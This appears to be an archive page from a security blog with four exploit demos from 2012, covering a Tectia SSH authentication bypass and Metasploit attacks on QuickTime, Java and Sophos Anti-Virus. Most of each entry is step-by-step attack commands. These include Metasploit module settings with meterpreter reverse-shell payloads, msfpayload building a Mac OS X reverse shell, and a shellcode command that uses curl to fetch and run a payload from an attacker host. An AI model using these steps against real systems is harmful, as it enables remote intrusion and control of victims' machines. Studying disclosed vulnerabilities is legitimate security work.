Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

Tectia SSH Server Authentication Bypass Remote 0day Exploit Demo

Exploits,

Timeline :

Vulnerability discovered by @kingcope
Vulnerability disclosed by @kingcope the 2012-12-01

PoC provided by :

kingcope

Reference(s) :

Full Disclosure Mailing-list

Affected version(s) :

All versions of Tectia SSH Server

Tested on Centos 5.8 x86 with :

Tectia SSH Server 6.3.2.33

Description :

An attacker in the possession of a valid username of an SSH Tectia installation running on UNIX (verified on AIX/Linux) can login without a password. The bug is in the “SSH USERAUTH CHANGE REQUEST” routines which are there to allow a user to change their password. A bug in the code allows an attacker to login without a password by forcing a password change request prior to authentication.

Commands :

You're OpenSSH client should be patched with the diff file provided by kingcope in order to force the password reset request.

On the target :

ifconfig
uname -a
rpm -qi ssh-tectia-server-6.3.2-33

netstat -lntp

On the attacker :

ifconfig
uname -a

./ssh -lroot 192.168.178.34

CVE-2012-3752 Apple QuickTime TeXML Vulnerability Metasploit Demo

Exploits, Metasploit, ,

Timeline :

Vulnerability reported to vendor by Arezou Hosseinzad-Amirkhizi
Coordinate public release of the vulnerability the 2012-11-05
Metasploit PoC provided by juan vazquez the 2012-11-22

PoC provided by :

Arezou Hosseinzad-Amirkhizi
juan vazquez

Reference(s) :

CVE-2012-3752
OSVDB-87087
BID-56557
HT5581

Affected version(s) :

QuickTime 7.7.2 and earlier for Windows

Tested on Windows XP Pro SP3 with :

QuickTime 7.7.2
Firefox 3.5.1

Description :

This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow, and then gain arbitrary code execution under the context of the user. This is due to the QuickTime3GPP.gtx component not handling certain Style subfields properly, as the font-table field, which is used to trigger the overflow in this module. Because of QuickTime restrictions when handling font-table fields, only 0x31-0x39 bytes can be used to overflow, so at the moment DEP/ASLR bypass hasn’t been provided. The module has been tested successfully on IE6 and IE7 browsers (Windows XP and Vista).

Commands :

use exploit/windows/browser/apple_quicktime_texml_font_table
set SRVHOST 192.168.178.26
set TARGET 3
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

sessions -i 1

getuid
sysinfo

CVE-2012-5076 Java Applet JAX-WS Remote Code Execution Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability patched by Oracle in 2012 October CPU
Vulnerability discovered exploited in the wild by @kafeine the 2012-11-09
Metasploit PoC provided by juan vazquez the 2012-11-11

PoC provided by :

Unknown
juan vazquez

Reference(s) :

CVE-2012-5076
OSVDB-86363
BID-56054
Oracle October 2012 CPU
Cool EK : “Hello my friend…”

Affected version(s) :

Java 1.7.0_07-b10 and earlier

Tested on Windows XP Pro SP3 with :

Java 1.7.0_07-b10

Description :

This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in November of 2012. The vulnerability affects Java version 7u7 and earlier.

Commands :

use exploit/multi/browser/java_jre17_jaxws
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

sessions -i 1

getuid
sysinfo

Sophos Anti-Virus Sophail PDF Vulnerability Metasploit Payload Demo

Exploits, Metasploit,

Timeline :

Vulnerabilities reported to vendor by Tavis Ormandy the 2012-09-10
Public release of the vulnerabilities by Tavis Ormandy the 2012-11-05
PoC provided by Tavis Ormandy the 2012-10-02

PoC provided by :

Tavis Ormandy

Reference(s) :

Full Disclosure
Sophail: Applied attacks against Sophos Antivirus
Sophos products and Tavis Ormandy
VU#662243

Affected version(s) :

Sophos products for Mac OS X
Sophos products for Windows
Sophos products for Linux

Tested on Mac OS X 10.8.2 with :

Sophos Anti-Virus for Mac Home Edition

Description :

This PoC demonstrate one of the Sophos products vulnerabilities reported by Tavis Ormandy. This PoC exploit a PDF stack buffer overflow vulnerability present in Sophos onaccess scanner.

Demo :

1) Create a Mac OS X Metasploit payload:

msfpayload osx/x86/shell_reverse_tcp LHOST=192.168.178.26 X > mac_os_x_payload

2) Modify Sophail shellcode.asm file with, for example:

.command: db "curl -s http://192.168.178.26/mac_os_x_payload > mac_os_x_payload | chmod u+x mac_os_x_payload && ./mac_os_x_payload", 0

3) Make 4) Upload index.html, exploit.bin and exploit.png on a web server 5) Initiate a Metasploit multihandler

use exploit/multi/handler set PAYLOAD osx/x86/shell_reverse_tcp set LHOST 192.168.178.26 exploit -j

6) On the target surf index.html file

7) Exploit the session :)

session -i 1 id /sbin/ifconfig uname -a